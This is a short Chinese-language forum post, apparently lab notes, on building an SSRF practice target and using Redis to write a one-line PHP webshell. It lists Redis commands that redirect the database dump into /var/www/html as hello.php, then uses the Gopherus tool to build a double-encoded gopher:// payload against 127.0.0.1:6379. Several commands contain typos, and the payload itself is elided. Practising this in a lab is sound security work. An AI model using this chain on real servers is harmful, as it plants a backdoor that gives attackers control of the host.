SSRF靶场搭建并利用redis写入一句话拿webshell-女黑客 - Powered by Discuz! Archiver

nvhack 发表于 2023-1-31 00:18:56

SSRF靶场搭建并利用redis写入一句话拿webshell

redis-server
redis-cls
set name zhangsan
get name
set age 18
get age
keys *
flushall


config set dir /var/www/html


config set dbfilename hello.php
set content 'aaa'
save


gopher 协议
apt-get installpython3-pip
python2 get-pip.py

sudo chmod+x install.sh
sudo python2 gopherus.py --exploit redis

gopher://127.0.0.1:6379***
双编码后执行,即可得到webshell





页: [1]
查看完整版本: SSRF靶场搭建并利用redis写入一句话拿webshell